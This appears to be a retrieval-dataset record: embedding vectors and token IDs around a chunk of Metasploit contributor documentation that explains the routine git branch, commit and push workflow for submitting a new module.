-0.840653121471405, -0.46209272742271423, 0.15096992254257202, 0.6142286658287048, 0.850281834602356, -0.7149319052696228, 0.7754476070404053, -0.06675390154123306, -0.5508513450622559, -0.0008461454999633133, -0.6097672581672668, 0.19091005623340607, 0.0329098142683506, 0.04570206254720688, 0.7686654925346375, -0.1235470324754715, 0.04231071099638939, -0.38912153244018555, 0.04889766126871109, -0.15736529231071472, 0.5086996555328369, -0.209486722946167, 0.2681412100791931, -0.1150345727801323, 0.4495057463645935, 0.4237091541290283, -1.245214581489563, 0.15911057591438293, 0.014330138452351093, 0.43737152218818665, 1.2615926265716553, 0.3049461245536804, -0.15753613412380219, -0.2484116405248642, 0.05208427459001541, 0.2472895234823227, 0.20848898589611053, -0.23580853641033173, -0.31407174468040466, 0.24376536905765533, 0.06261815875768661, -0.4615756869316101, 0.4107774496078491, -0.34874290227890015, 0.35654184222221375, -0.20676785707473755, -0.19146668910980225, -0.06995745748281479, 0.331380158662796, 0.38088423013687134, 0.41901662945747375, -0.5989115834236145, 0.5704124569892883, -0.47765785455703735, -0.44615012407302856, -0.8300561308860779, -0.02128315158188343, 0.33880433440208435, -0.29709216952323914, -0.07524008303880692, -0.14567333459854126, 1.5070459842681885, 0.39242103695869446, 0.03486958146095276, 0.10033225268125534, 0.40035492181777954, 0.026879187673330307, -0.9475991725921631, 0.29209694266319275, 0.08406992256641388, 0.686424732208252, 0.024162836372852325, 0.20077411830425262, -0.06993501633405685, -0.4307578504085541, -0.11888168752193451, -0.7519266605377197, -0.11088298261165619, 0.4661419093608856, -0.20826072990894318, 0.49876129627227783, 0.8816779851913452, -0.21354931592941284, -1.4253509044647217, 0.6454123258590698, 0.28075796365737915, -1.2823846340179443, -0.6012564301490784, 0.02666056901216507, 0.008246008306741714, 0.34212565422058105, -0.6551998257637024, -0.19578376412391663, 0.30033329129219055, 0.8478291630744934, -0.3075883388519287, 0.570580005645752, 0.6101458072662354, -0.18622836470603943, -0.38103845715522766, -0.33966007828712463, -0.25055310130119324, -0.4445227384567261, 0.012600277550518513, 0.3938511610031128, -0.6061270236968994, 0.26037096977233887, 0.007433731108903885, 0.6262935996055603, 0.4286314845085144, -0.23609670996665955, -0.11412649601697922, -0.4563916325569153, -0.13878804445266724, 0.6248468160629272, -1.3955509662628174, 0.09167870879173279, -0.7037408351898193, 0.29953426122665405, 0.08349646627902985, 1.5283427238464355, 0.11075906455516815, -0.7626283168792725, 0.9492005705833435, 0.5971996784210205, -0.04390876740217209, 0.6687998175621033, 0.39111801981925964, 0.4696858525276184, 0.1875506043434143, 0.6071614623069763, 0.1923409253358841, 0.573835015296936, 0.4145069420337677, -0.4726255238056183, 0.2075270265340805, 0.1436835378408432, -0.6130515933036804, 1.053635597229004, 0.025065923109650612, -0.06077490374445915, -0.6708997488021851, -0.7560602426528931, 0.17273491621017456, 1.4383536577224731, -0.9924275875091553, -0.6257392168045044, 0.0039165932685136795, -0.11602377891540527, -0.9235795736312866, -0.38224080204963684, -0.21004587411880493, 0.20709335803985596, -0.8538883924484253, 0.4758014976978302, 0.043212395161390305, -0.47736799716949463, -0.6022126078605652, -0.45879754424095154, -0.7559929490089417, -0.2039644718170166, -0.5588424205780029, -0.06866241991519928, -0.32310035824775696, -0.24921715259552002, 0.6555623412132263, -0.8328644633293152, -0.41238296031951904, 0.0819551944732666, 0.6286674737930298, 0.5002493262290955, -0.08224066346883774, -0.026533665135502815, -0.44065356254577637, 0.5597740411758423, -0.09964490681886673, 1.161932110786438, 0.05200131982564926, -0.503268301486969, -0.7374711632728577, -0.20640423893928528, 0.19299402832984924, 0.3752623498439789, 0.28601378202438354, 0.5958415865898132, -0.5510183572769165, -0.16702522337436676, -0.2935492694377899, -0.32183510065078735, 0.6805201172828674, -0.04714621230959892, -0.4651169776916504, -0.06359664350748062, -0.5284673571586609, -0.3941155970096588, 0.19513235986232758, 0.4370215833187103, -0.9570018649101257, 0.5275123119354248, 0.0836048275232315, 0.41194626688957214, -0.9213550686836243, 0.3235304355621338, 0.0085905184969306, 0.20828372240066528, -0.15631279349327087, -0.06625765562057495, 0.44634321331977844, -0.0990389883518219, -0.34408074617385864, 0.02598704770207405, -0.20897924900054932, 0.03254064917564392, 0.489565908908844, -1.1392383575439453, 0.6744295954704285, -0.24068713188171387, -0.49476784467697144, -0.4097607731819153, -0.47764670848846436, 0.5602449178695679, -0.2229240983724594, -0.3554818034172058, -0.554197371006012, -0.8517147302627563, 0.2829742133617401, 0.08936949074268341, 0.003464917652308941, -0.7727610468864441, 0.5155286192893982, 0.6382499933242798, 0.11068244278430939, 0.5230856537818909, 0.26804232597351074, -0.7779722213745117, -0.46744340658187866, 0.10574214160442352, 0.3047484755516052, 0.1852995604276657, 0.13351085782051086, 1.2063182592391968, 0.5106514692306519, 0.8006992340087891, -0.32641780376434326, -0.4643462598323822, 0.4665234386920929, -0.13882996141910553, 0.23983661830425262, 0.38955914974212646, -0.1535070240497589, -0.2150924652814865, -0.543847382068634, -0.18725362420082092, -0.1043458878993988, 0.08706203103065491, 0.3485705256462097, 0.046656034886837006, 0.8173002600669861, -0.19535790383815765, -0.1671195775270462, 0.16012388467788696, -0.5097307562828064, -0.6457758545875549, 0.4764023721218109, 0.08020695298910141, 0.7771506309509277, 0.01776234433054924, -0.47737956047058105, 0.11724182218313217, -0.0765908882021904, 0.34368637204170227, 0.20205163955688477, 0.01599092222750187, -0.3837747871875763, -0.4484982490539551, -0.5750311613082886, -0.4559488594532013, 0.1023930087685585, 0.31086060404777527, 0.037202391773462296, -0.7987235188484192, -0.5719191431999207, -0.7617854475975037, 0.7828207612037659, 0.9326176047325134, 0.5689738988876343, 0.8574548959732056, 0.5258808135986328, 0.25330910086631775, -0.26496219635009766, 0.5385501384735107, 0.22890876233577728, 0.4020097851753235, -0.6240612864494324, 0.8955966234207153, 0.1770172417163849, 0.617042064666748, -0.14412745833396912, -0.1573353260755539, 0.3643535375595093, 0.055833783000707626, -0.11463151127099991, 0.02496655471622944, -0.3449024260044098, -0.3753904104232788, 0.1906079351902008, 0.4324168562889099, -0.5771855711936951, -0.44825637340545654, -0.6871070861816406, 0.4064350426197052, 0.368208110332489, -0.844511866569519, -0.5551502704620361, -0.14095301926136017, -0.08482767641544342, 0.3980978727340698, -0.4233042299747467, -0.311087965965271, -0.05051785707473755, -0.45324450731277466, -0.5129455924034119, 0.6805939078330994, 0.565238356590271, 0.06677528470754623, -0.024694325402379036, -0.1937623769044876, -0.16568027436733246, 0.11095625907182693, -0.770683228969574, -0.47345906496047974, -0.05099591240286827, 0.5754088759422302, 0.06399674713611603, 0.40007323026657104, 0.0724807158112526, -0.6615161299705505, 0.4817982316017151, -0.264520525932312, -0.226745143532753, -0.5222561955451965, 0.4065593481063843, 0.4403659403324127, 0.306841105222702, 0.028778936713933945, -0.12065424025058746, -0.6205394864082336, 0.3336544632911682, -0.19025003910064697, 0.03152532875537872, -0.35743051767349243, -0.09275203198194504, 0.9152005314826965, 0.3341220021247864, -0.6773861646652222, 0.267780601978302, 0.4713733494281769, -0.3742519021034241, 0.35734373331069946, -0.04769841954112053, 0.19920487701892853, 0.1779683381319046, -0.6194666028022766, 0.988633930683136, 0.023532472550868988, -0.14380908012390137, -0.19925753772258759, -0.914588212966919, 0.6079183220863342, 0.09498804807662964, 0.2904033958911896, -0.8916131258010864, -0.8503401279449463, -0.19537237286567688, 0.06357365846633911, -0.030397450551390648, 0.2868715524673462, 0.017838740721344948, -0.13124461472034454, -0.2940395772457123, 0.16969072818756104, -0.6249716877937317, -0.6402410268783569, -0.4995960295200348, -0.27529871463775635, -0.06953403353691101, -0.0947200357913971, 0.5640324950218201, -0.11747311800718307, 0.10327402502298355, 0.4139982759952545, -0.008782845921814442, 0.2443801313638687, -0.07102014869451523, -0.04999494552612305, -0.6260982155799866, 0.4501640796661377, -0.558616578578949, 0.3392200171947479, -0.21223589777946472, 0.35860908031463623, 0.012456709519028664, 0.19577263295650482, 0.5661121606826782, -0.5211109519004822, -0.6456983685493469, 0.6771961450576782, 0.04589127376675606, -1.001326560974121, 0.23203147947788239, 0.1322999894618988, -0.2980237901210785, 0.05279933661222458, 0.14563420414924622, -0.3214670419692993, -1.2993851900100708, -0.6213806867599487, -0.010914585553109646, 0.09555773437023163, -0.26626020669937134, -0.5747699737548828, -0.8282329440116882, 0.13926565647125244, 0.2265898883342743, 0.4762488305568695, -1.0748460292816162, 0.11300237476825714, -0.16696575284004211, -0.11492885649204254, -0.19668951630592346, 0.020248306915163994, 0.08874310553073883, -0.5600051283836365, -0.16998668015003204, 0.8759223818778992, -0.30200836062431335, -0.5499348044395447, -0.42356786131858826, 0.3793606460094452, 0.12270715832710266, 0.4763313829898834, -0.5130254030227661, -0.5885242223739624, -0.1947772204875946, 0.15974003076553345, 0.3152354955673218, 0.5536863803863525, -0.3961344361305237, 0.5542149543762207, 0.07496363669633865, 0.5014209151268005, -0.06145424395799637, -0.14764095842838287, -0.7096726298332214, -0.22815963625907898, 0.46393072605133057, -0.5399932265281677, -0.13010556995868683, -0.26519498229026794, 0.3179199993610382, 0.5715231895446777, -0.3964990973472595, -0.21888919174671173, 0.11945689469575882, -0.4717279076576233, -0.9592788219451904, 0.02670956775546074, -0.28583618998527527, 0.2227909415960312, 0.35678520798683167, -0.35636550188064575, 0.8021032214164734, -1.0382754802703857, 0.033372554928064346, 1.0043822526931763, 0.9967825412750244, 0.08683689683675766, -0.7062866687774658, 0.4747888147830963, 0.3297180235385895, -0.01110259722918272, 0.7451837658882141, -0.3452848196029663, -0.21677273511886597, -0.7476072907447815, -0.26770591735839844, -0.10191917419433594, -0.43684807419776917, -0.2690734565258026, 0.6757688522338867, 0.12950162589550018, 0.4885060787200928, -0.15703058242797852, -0.6506564617156982, -0.018707122653722763, 0.5071186423301697, -0.13882708549499512, -0.19203047454357147, 0.44859978556632996, 0.32946884632110596, -0.15535984933376312, -0.502285361289978, -0.004390858579427004, 0.123221755027771, 0.13525575399398804, 0.46928703784942627, 0.7964596748352051, -0.3825371563434601, 0.9357919096946716, 0.4280775487422943, -0.9738025665283203, -0.418673038482666, -0.5286526679992676, 0.40055495500564575, -0.3579564392566681, -0.6483825445175171, -0.44547298550605774, 0.1986606866121292, -0.05976925417780876, 0.46572765707969666, 0.6505994200706482, -0.28438541293144226, 0.08233131468296051, -0.6525627970695496, 0.30100616812705994, 0.020988259464502335, -0.11268674582242966, 0.5184284448623657, -1.0599560737609863, -0.3825295567512512, -0.49043673276901245, -0.2489626705646515, 0.12759263813495636, 0.05567773059010506, 0.5673378705978394, 0.22501204907894135, 0.0874025970697403, -0.0004983032122254372, 0.4991326630115509, 0.5610608458518982, -0.10514095425605774, 0.45870399475097656, 0.44895535707473755, -0.36678948998451233, -1.1228065490722656, -0.13562701642513275, -0.16313843429088593, -0.4997510313987732, 0.07576435804367065, -0.30631136894226074, -0.27512678503990173, -0.30967679619789124, -0.06088809669017792, -0.367327481508255, -1.1891047954559326, -0.6546974778175354, -0.666030764579773, 0.23491281270980835, 0.26604652404785156, -0.4250859022140503, 0.11507349461317062, 0.1390087604522705, -0.0256442092359066, -0.25381535291671753, -0.6036461591720581, 0.6946417093276978, 0.013842112384736538, -0.3640122711658478, -0.20156481862068176, 0.7498903274536133, -0.49896928668022156, -0.590082049369812, -0.5627918243408203, 0.2547873854637146, -0.7150299549102783, -0.9213676452636719, 0.07888606935739517, 0.08931127935647964, -0.45129725337028503, 0.20586396753787994, 0.18125009536743164, -0.0760420709848404, 0.016251608729362488, -1.1738663911819458, 0.7975893616676331, 0.2876838147640228, -0.7632496953010559, 0.4575732350349426, -0.3682568669319153, 0.017858961597085, 0.7401157021522522, -0.6972677111625671, 0.8045420050621033, -0.05279017612338066, 0.09256283938884735, 0.3617042303085327, 0.4677422344684601, -0.8833762407302856, -0.0779765397310257, -0.4186229705810547, -1.0099554061889648, -0.23840202391147614, -0.543204665184021, -0.013236155733466148, -0.17114576697349548, -0.6548707485198975, -0.1840326339006424, 0.368721604347229, 0.8246826529502869, -0.040538739413022995, -0.1535395234823227, 0.6014748215675354, 0.4980989396572113, -0.3147396445274353, -0.07494001090526581, 0.5695668458938599, -0.5277941226959229, 0.15521790087223053, 0.11401316523551941, 0.42745307087898254, -0.33500173687934875, 0.25903621315956116, -0.07333999872207642, 0.46718522906303406, -0.3084186315536499, 0.11123500764369965, 0.3050634264945984, 0.7954152226448059, 0.0718865916132927, -0.4099758565425873, -0.20723897218704224, -0.48397690057754517, -0.033967193216085434, -0.35844847559928894, -1.02144193649292, 0.2503087818622589, 0.3344220221042633, -0.4926009476184845, -0.043513279408216476, -0.08275701105594635, -0.26947781443595886, -0.07243827730417252, -0.005913673434406519, 0.7637840509414673, 0.08836858719587326, -0.1333288699388504, 0.15236793458461761, 1.0557334423065186, -0.9939640164375305, -0.5417948365211487, 0.348745733499527, 0.24740685522556305, -0.4346058964729309, -0.5518447160720825, -0.14136198163032532, 0.7335664629936218, -0.06906798481941223, -0.06358474493026733, -0.4838530421257019, 0.02068091370165348, 0.38454994559288025, 0.22426995635032654, -0.05630439892411232, 0.21007652580738068, -0.8089009523391724, 0.3137730062007904, -0.34740012884140015, 0.2938196361064911, -0.2543198764324188, -0.1076018214225769, 0.6010010242462158, 0.4443957805633545, -0.6580711007118225, 1.2749251127243042, -0.002912159776315093, 0.40387797355651855, 1.1184426546096802, 0.859110414981842, 0.7153793573379517, -0.5739856958389282, 0.006445299368351698, -0.15705254673957825, 0.39520224928855896, -0.1433296799659729, 0.4791024625301361, 0.21094302833080292, -0.015839364379644394, 0.4455423355102539, -0.5244412422180176, 0.054710108786821365, 0.2605092525482178, 0.10933555662631989, -0.4833338260650635, 0.38444870710372925, -0.4968404173851013, 0.012613528408110142, -0.27087903022766113, 0.22712969779968262, 0.6071043014526367, 0.22348101437091827, -0.32656386494636536, -0.36960291862487793, -0.4716068208217621, 0.3869464099407196, -0.684821367263794, 0.07368484884500504, 0.44379377365112305, 0.007430428639054298, 0.18455280363559723, 0.06006120517849922, -0.5603599548339844, 0.3003518581390381, 0.9296284317970276, 0.1270076185464859, -0.3182317614555359, 0.25142788887023926, 0.11305664479732513, 0.1436934620141983, -0.11559943854808807, -0.05060876905918121, -0.2943357825279236, 0.15295180678367615, 0.15484127402305603, -0.17026323080062866, -0.7384926080703735, -0.09047157317399979, 0.3595666289329529, 0.46861934661865234, 0.29653099179267883, -0.5371702313423157, 0.7498270869255066, -0.38042035698890686, 0.9340747594833374, -0.3112756609916687, 0.41408440470695496, 0.4204709827899933, -0.6790866851806641, -0.7309747934341431, 0.5618650317192078, 0.23874130845069885, 0.46689292788505554, 0.42132464051246643, 0.6549103260040283, -0.019505787640810013, 0.4260867238044739, 0.2475041002035141, -0.4415229856967926, -0.2827771306037903, -0.015142210759222507, -0.06116611510515213, -0.2825251519680023, 0.8880258202552795, -0.4197174906730652, 0.4602060317993164, 0.29255643486976624, 0.40652695298194885, -0.308444619178772, 0.08354348689317703, -0.6540960669517517, 0.04859752207994461, 0.3981049656867981, -0.058059874922037125, -1.3616278171539307, -0.37179484963417053, 0.5126813054084778, 0.11565670371055603, 0.44812682271003723, 0.2507711946964264, -0.6004819869995117, -0.9375981092453003, 0.1477900743484497, -0.27167055010795593, 0.9452058672904968, 0.3096732497215271, -0.39368289709091187, -0.11809815466403961, -0.5171277523040771, -0.12346818298101425, -0.2450154721736908, -0.8341067433357239, -0.19772234559059143, 0.7174112200737, 0.3312080502510071, 0.4713996350765228, 0.2305174320936203, -0.30379536747932434, -0.6565684676170349, 0.39525195956230164, 1.0168447494506836, -0.2869942784309387, 1.0940957069396973, 0.2511448562145233, 0.3136056959629059, 0.3991689682006836, -0.2528473436832428, 0.11554884165525436, -0.2879275381565094, 0.0914960503578186, -0.07634682208299637, -0.11024774610996246, -0.2512980103492737, -0.5354356169700623, -0.21082814037799835, 0.5084180235862732, 0.3564860224723816, -0.19180069863796234, -1.0030689239501953, -0.10690081119537354, -0.8987348675727844, -0.5415588617324829, -0.7923980951309204, 0.541831910610199, 0.33846259117126465, 0.17831198871135712, 0.7404507398605347, -1.112630844116211, 4.407832145690918, 0.555574357509613, -0.11403559893369675, 0.41701045632362366, 0.4241999685764313, 0.5550091862678528, 0.8341042995452881, -0.03407377004623413, 0.7498458623886108, -0.9755099415779114, 0.01167250145226717, -0.8539046049118042, 0.14367221295833588, 1.0772631168365479, 0.27439695596694946, 0.250049889087677, -0.9292917847633362, -0.23426978290081024, 0.1891610473394394, -0.6277746558189392, -1.2064510583877563, -0.315538614988327, -0.15100541710853577, 0.573368489742279, -0.01980706863105297, -0.13257570564746857, 0.3212813138961792, -0.7405411601066589, 0.39275285601615906, 0.38925063610076904, 0.659352719783783, -0.060629766434431076, 0.800477921962738, -0.770982563495636, -0.5078238248825073, -0.4475003778934479, 0.08605831116437912, -0.5122891664505005, -0.41184964776039124, -0.2711300849914551, 0.7853913903236389, 0.7293877601623535, -0.010867627337574959, -0.2505146861076355, 0.6358798742294312, 0.7423677444458008, -0.5197581648826599, 0.546177089214325, 0.7436160445213318, -0.7362782955169678, 1.085487723350525, -0.0017376742325723171, 0.5434346795082092, 0.06210426613688469, -0.6380554437637329, 0.9312819838523865, 0.5035457015037537, -0.39337408542633057, 0.19678986072540283, -0.4037977159023285, 0.12463440001010895, -0.5173619389533997, -0.0017028170404955745, 0.0506637766957283, 0.025335239246487617, 0.44250044226646423, -0.27821147441864014, 0.16111785173416138, -0.026164596900343895, 0.1564614325761795, -0.6449907422065735, 0.23532035946846008, -0.2925940454006195, -1.068305253982544, 0.8505564332008362, -0.5825212001800537, -0.290459007024765, -0.025471892207860947, 0.8856172561645508, -0.11927073448896408, -0.7415053844451904, -0.8250144124031067, -1.1039985418319702, 0.20382560789585114, 0.21115067601203918, 0.16878698766231537, 0.08802343904972076, -0.9319934844970703, -0.06918900460004807, -0.174580916762352, 0.17237938940525055, 0.375791996717453, -0.27488410472869873, 0.5089867115020752, 0.16285830736160278 ]
[ 1996, 2171, 2492, 2064, 4088, 2007, 1996, 21431, 2171, 1010, 2021, 11887, 1012, 2628, 2011, 1996, 4007, 2171, 1012, 1998, 2059, 1037, 2261, 2616, 2008, 10468, 6235, 2054, 2009, 1521, 1055, 2005, 1012, 2005, 2742, 1024, 1523, 2079, 29521, 2906, 2099, 9413, 2361, 1013, 13675, 2213, 8833, 2378, 9710, 1524, 1996, 6412, 2492, 2323, 4863, 2054, 1996, 11336, 2515, 1010, 2477, 2000, 3422, 2041, 2005, 1010, 3563, 5918, 1010, 1996, 2062, 1996, 2488, 1012, 1996, 3125, 2003, 2000, 2292, 1996, 5310, 3305, 2054, 2002, 1521, 1055, 2478, 2302, 1996, 2342, 2000, 2941, 3191, 1996, 11336, 1521, 1055, 3120, 1998, 3275, 2477, 2041, 1012, 1998, 3404, 2033, 1010, 2087, 1997, 2068, 2123, 1521, 1056, 1012, 1996, 3166, 2492, 2003, 2073, 2017, 2404, 2115, 2171, 1012, 1996, 4289, 2323, 2022, 1523, 2171, 1523, 1012, 2065, 2017, 2215, 2000, 2031, 2115, 10474, 5047, 2045, 1010, 2681, 2009, 2004, 1037, 7615, 1010, 2005, 2742, 1024, 1523, 2171, 1001, 5047, 1524, 2138, 1996, 5796, 2546, 1024, 1024, 9830, 1024, 1024, 26221, 4666, 2378, 2003, 2061, 2759, 1010, 2057, 6618, 2017, 2215, 1037, 23561, 2005, 2009, 1010, 2205, 1012, 1998, 2182, 2017, 2175, 1024, 1001, 1001, 1001, 2023, 11336, 5942, 18804, 13102, 4135, 4183, 1024, 24471, 2140, 1001, 2783, 3120, 1024, 24471, 2140, 1001, 1001, 2465, 18804, 13102, 4135, 4183, 5302, 8566, 2571, 1026, 5796, 2546, 1024, 1024, 9830, 2421, 5796, 2546, 1024, 1024, 9830, 1024, 1024, 26221, 13366, 3988, 4697, 1006, 18558, 1027, 1063, 1065, 1007, 3565, 1006, 10651, 1035, 18558, 1006, 18558, 1010, 1005, 2171, 1005, 1027, 1028, 1005, 11336, 2171, 1005, 1010, 1005, 6412, 1005, 1027, 1028, 1003, 1053, 1063, 2360, 2242, 2008, 1996, 5310, 2453, 2215, 2000, 2113, 1012, 1065, 1010, 1005, 3166, 1005, 1027, 1028, 1031, 1005, 2171, 1005, 1033, 1010, 1005, 6105, 1005, 1027, 1028, 5796, 2546, 1035, 6105, 1007, 1007, 2203, 13366, 2448, 1035, 3677, 1006, 12997, 1007, 1001, 2364, 4118, 2203, 2203, 3937, 21025, 2102, 10954, 11368, 3022, 24759, 28100, 2053, 2936, 3594, 17917, 2078, 2005, 3120, 3642, 2968, 1010, 2612, 2057, 2224, 21025, 2102, 1010, 2061, 4209, 2070, 12225, 2007, 21025, 2102, 2175, 1037, 2146, 2126, 1012, 2057, 1521, 2128, 2025, 2182, 2000, 8835, 2017, 2055, 2129, 12476, 21025, 2102, 2003, 1010, 2057, 2113, 2009, 2038, 1037, 4083, 7774, 1998, 2009, 1521, 1055, 2025, 11341, 2000, 2424, 2047, 5198, 2437, 12051, 1012, 2296, 2320, 1037, 2096, 1010, 2115, 21025, 2102, 1523, 7385, 1524, 2097, 5926, 1999, 1010, 1998, 2057, 3305, 1012, 2174, 1010, 2009, 1521, 1055, 2590, 2005, 2017, 2000, 2202, 5056, 1997, 23346, 1012, 2296, 2051, 2017, 2191, 1037, 11336, 1010, 2030, 2191, 2070, 3431, 2000, 4493, 3642, 1010, 2017, 2323, 2025, 2079, 2061, 2006, 1996, 12398, 3040, 3589, 1012, 2339, 1029, 2138, 2043, 2017, 2079, 1037, 5796, 11263, 17299, 3686, 1010, 2029, 2003, 18804, 13102, 4135, 4183, 1521, 1055, 9710, 2005, 2039, 16616, 2115, 22409, 1010, 2009, 2097, 2079, 1037, 21025, 2102, 25141, 2077, 16468, 1996, 3431, 1010, 1998, 2035, 2115, 3642, 2175, 9061, 1011, 9061, 1012, 2178, 6707, 2111, 7166, 2000, 2079, 2003, 2031, 2035, 1996, 3431, 2006, 3040, 2077, 12040, 3436, 1037, 4139, 5227, 1012 ]
metasploit
112.txt
2
this is a bad idea, because most likely you ’ re submitting other crap you don ’ t intend to change, and / or you ’ re probably asking us to merge other unnecessary commit history when there only needs to be one commit. thanks for contributing your module to the community, but no thanks to your crazy commit history. so as a habit, when you want to make something new, or change something, begin with a new branch that ’ s up to date to master. first off, make sure you ’ re on master. if you do a git status it will tell you what branch you ’ re currently on : $ git status # on branch upstream - master nothing to commit, working directory clean ok, now do a git pull to download the latest changes from metasploit : $ git pull already up - to - date. at this point, you ’ re ready to start a new branch. in this case, we ’ ll name our new branch β€œ my _ awesome _ branch ” : $ git checkout - b my _ awesome _ module switched to a new branch'my _ awesome _ module'and then you can go ahead and add that module. make sure it ’ s in the appropriate path : $ git add [ module path ] when you decide to save the changes, commit ( if there ’ s only one module, you can do git commit - a too so you don ’ t have to type the module path. note - a really means everything ) : $ git commit [ module path ] when you ’ re done, push your changes, which will upload your code to your remote branch β€œ my _ awesome _ branch ”. you must push your changes in order to submit the pull request, or share it with others on the internet. $ git push origin my _ awesome _ branch referencesurl / tree / master / modules / auxiliaryurl / blob / master / lib / msf / core / auxiliary. rburl / blob / master / lib / msf / core / auxiliary / scanner. rb [SEP]
[ 0.6604064106941223, 0.21210211515426636, -0.6843643188476562, 0.046089328825473785, -0.7452551126480103, -1.2412259578704834, 0.491711288690567, -0.08663273602724075, 0.6267801523208618, 1.2143516540527344, 0.17995694279670715, -0.07778840512037277, 0.6356717944145203, -0.22611500322818756, -0.09796725958585739, -0.08807863295078278, 0.4145343601703644, -0.6209532618522644, -1.5024243593215942, 0.5215592384338379, 0.072006955742836, -0.40636563301086426, -0.8360451459884644, -0.32872843742370605, 0.01737537421286106, 0.781757652759552, 0.12555989623069763, 0.00018059929425362498, 1.2899820804595947, 0.9972419142723083, -0.4045052230358124, 0.05629447102546692, -0.2643442153930664, -0.6827002167701721, -0.22521723806858063, -0.37259501218795776, -0.07732008397579193, 0.04145894944667816, -0.49513089656829834, -1.2401202917099, -0.8343172073364258, -0.5857943296432495, 0.7383536100387573, -0.7271129488945007, -1.5774645805358887, 0.8984454870223999, 0.20167788863182068, -0.42664381861686707, 0.5194008946418762, -1.0413092374801636, -0.027913084253668785, 1.296099305152893, 0.18901607394218445, 0.5745149850845337, -0.25147950649261475, 0.21836185455322266, 0.11114156246185303, 0.3772590458393097, -0.12550923228263855, 0.8555514216423035, 0.6413068175315857, 0.7572997212409973, 0.06635170429944992, -1.1900124549865723, -0.017134396359324455, 0.9550204873085022, -0.7918076515197754, 0.07989402115345001, 0.14859580993652344, -0.5388113260269165, -0.20189271867275238, -0.27778807282447815, 0.08096027374267578, -0.5390424728393555, -0.40639105439186096, -0.060584887862205505, 1.149389624595642, 0.34950679540634155, -0.15752938389778137, 0.8550841808319092, 0.21075718104839325, 0.8652713298797607, 0.03913921117782593, 0.31784313917160034, -0.5891895294189453, -0.20584090054035187, 0.2558428943157196, -0.36065420508384705, -0.3815302550792694, 0.14042644202709198, 0.40366873145103455, 0.634904682636261, 0.14821648597717285, 0.25127291679382324, 0.21524964272975922, 0.628141462802887, -0.3260706067085266, 0.16582536697387695, 0.3068627715110779, 0.2830532193183899, 0.5382980704307556, 0.32909485697746277, 0.457267165184021, 0.34709855914115906, 0.30008217692375183, -0.49408507347106934, 0.26968395709991455, -0.3825157880783081, 0.7396519184112549, -0.19999034702777863, -0.31749269366264343, 0.18100513517856598, 0.15547670423984528, 0.23412787914276123, -0.3819144070148468, -0.16920174658298492, -0.016244737431406975, 0.652384877204895, -0.9634542465209961, -0.7002641558647156, 1.0046019554138184, -0.3261336386203766, -0.3334640562534332, -0.5263771414756775, -0.30151495337486267, 0.2832277715206146, 0.4055992066860199, 0.9498066306114197, -0.590626060962677, 0.1697930246591568, -0.4358391761779785, -0.5876357555389404, -0.37801340222358704, 0.4771348237991333, -0.07494638115167618, 0.18014800548553467, -0.61979740858078, 0.259812593460083, 0.779992938041687, -0.7699171304702759, -0.10117001831531525, 0.15134304761886597, 0.4054897725582123, 0.8616913557052612, 0.5323745012283325, -0.09322833269834518, -0.19180439412593842, -0.23534737527370453, -0.08468110114336014, 0.22569991648197174, -0.032489899545907974, -0.1047486737370491, 0.006383103784173727, -0.13365040719509125, -0.2255009263753891, 0.5569195747375488, -0.34199872612953186, 0.5497636795043945, 0.03690309450030327, 1.0550975799560547, -0.25222137570381165, 1.0744214057922363, 0.10457324236631393, 0.6866422891616821, -0.5813789963722229, 1.059274435043335, -0.4635409712791443, -0.3860623836517334, -0.592734694480896, 0.03613053634762764, 0.6365001797676086, -0.2330242097377777, -0.5263369679450989, -0.12599048018455505, 1.1524924039840698, 0.4224894642829895, 0.023021407425403595, 0.667084276676178, 0.19965773820877075, 1.0736581087112427, -0.14850680530071259, 0.7589908242225647, 0.9672471284866333, 0.4860342741012573, 0.0810408815741539, -0.024701744318008423, 0.10213043540716171, -0.044486042112112045, 0.05736645311117172, -0.7714319229125977, -0.3527977466583252, 0.5395037531852722, 0.22973230481147766, 1.0182236433029175, -0.37731578946113586, -0.5188162922859192, -0.28929510712623596, 0.24195817112922668, 0.6597499847412109, -0.2857678234577179, -1.15167236328125, 0.30487367510795593, -0.19033488631248474, 0.8982092142105103, -0.5870193243026733, -1.1169960498809814, 0.3342316746711731, 0.697620153427124, -0.6416480541229248, 0.05568540096282959, 0.8451674580574036, -0.19249588251113892, -0.6149809956550598, 0.2879329025745392, -0.31164464354515076, -1.007914662361145, 0.18808680772781372, 0.27353060245513916, -0.22194619476795197, -0.3711720108985901, 0.4015083909034729, 0.2854548692703247, 0.9097673892974854, -0.2349526584148407, -0.02531936578452587, 0.755523145198822, -0.15456928312778473, 0.45702654123306274, -0.2928082346916199, -0.14673231542110443, -0.4336264729499817, 0.481586217880249, 0.2845362722873688, 1.1660879850387573, 0.43843114376068115, -0.14662396907806396, 0.6582341194152832, 1.1036899089813232, -0.5463071465492249, 0.37970396876335144, 0.42065519094467163, -0.056736432015895844, 0.20712991058826447, 0.33384981751441956, -0.48742032051086426, -0.091227225959301, 0.4764957129955292, -0.6107168197631836, 0.11716947704553604, 0.18096040189266205, -0.6395018100738525, 1.0246062278747559, 0.005989122204482555, -0.3504243791103363, -0.1280636489391327, -0.34483417868614197, -0.017627110704779625, 0.5553364157676697, -0.9476697444915771, 0.13421101868152618, 0.0018115694401785731, 0.38064590096473694, -0.5653680562973022, 0.33659520745277405, 0.0830899104475975, 0.4916362762451172, -0.44682174921035767, -0.3022250831127167, -0.055906444787979126, -0.5240510702133179, -0.22856709361076355, -0.14805157482624054, -0.7672062516212463, -0.5702741742134094, -0.9070055484771729, 1.0904541015625, 0.011948397383093834, -0.688226044178009, -0.24315275251865387, -0.37760913372039795, 0.5013623237609863, -0.0016813499387353659, 0.045498427003622055, 0.6324759125709534, -0.036386314779520035, 0.0026391036808490753, -0.9024912714958191, 0.2920447289943695, -0.6053566336631775, 1.2315362691879272, -0.352765291929245, -0.6405304074287415, -0.739910900592804, 0.42152655124664307, -0.13204790651798248, 0.19597338140010834, -0.1978035569190979, -0.48030951619148254, -1.0230318307876587, -0.22628255188465118, -0.20312821865081787, -0.7574467658996582, 0.33758944272994995, -0.16536565124988556, 0.20936700701713562, -0.06644672900438309, -0.120077945291996, -0.8068614602088928, 1.174108862876892, 0.7769388556480408, -0.41695326566696167, 0.7220802307128906, -0.7341194748878479, 0.4892968237400055, -0.6406868100166321, -0.2327394038438797, 0.2582577168941498, 0.5445055365562439, -0.15908034145832062, -0.42004892230033875, -0.7900912761688232, -0.005449545569717884, 0.33540475368499756, -0.5116099715232849, 0.39932912588119507, 0.7209615707397461, 0.0860162079334259, -1.4180176258087158, 0.4323132634162903, -0.07646824419498444, -0.8168257474899292, 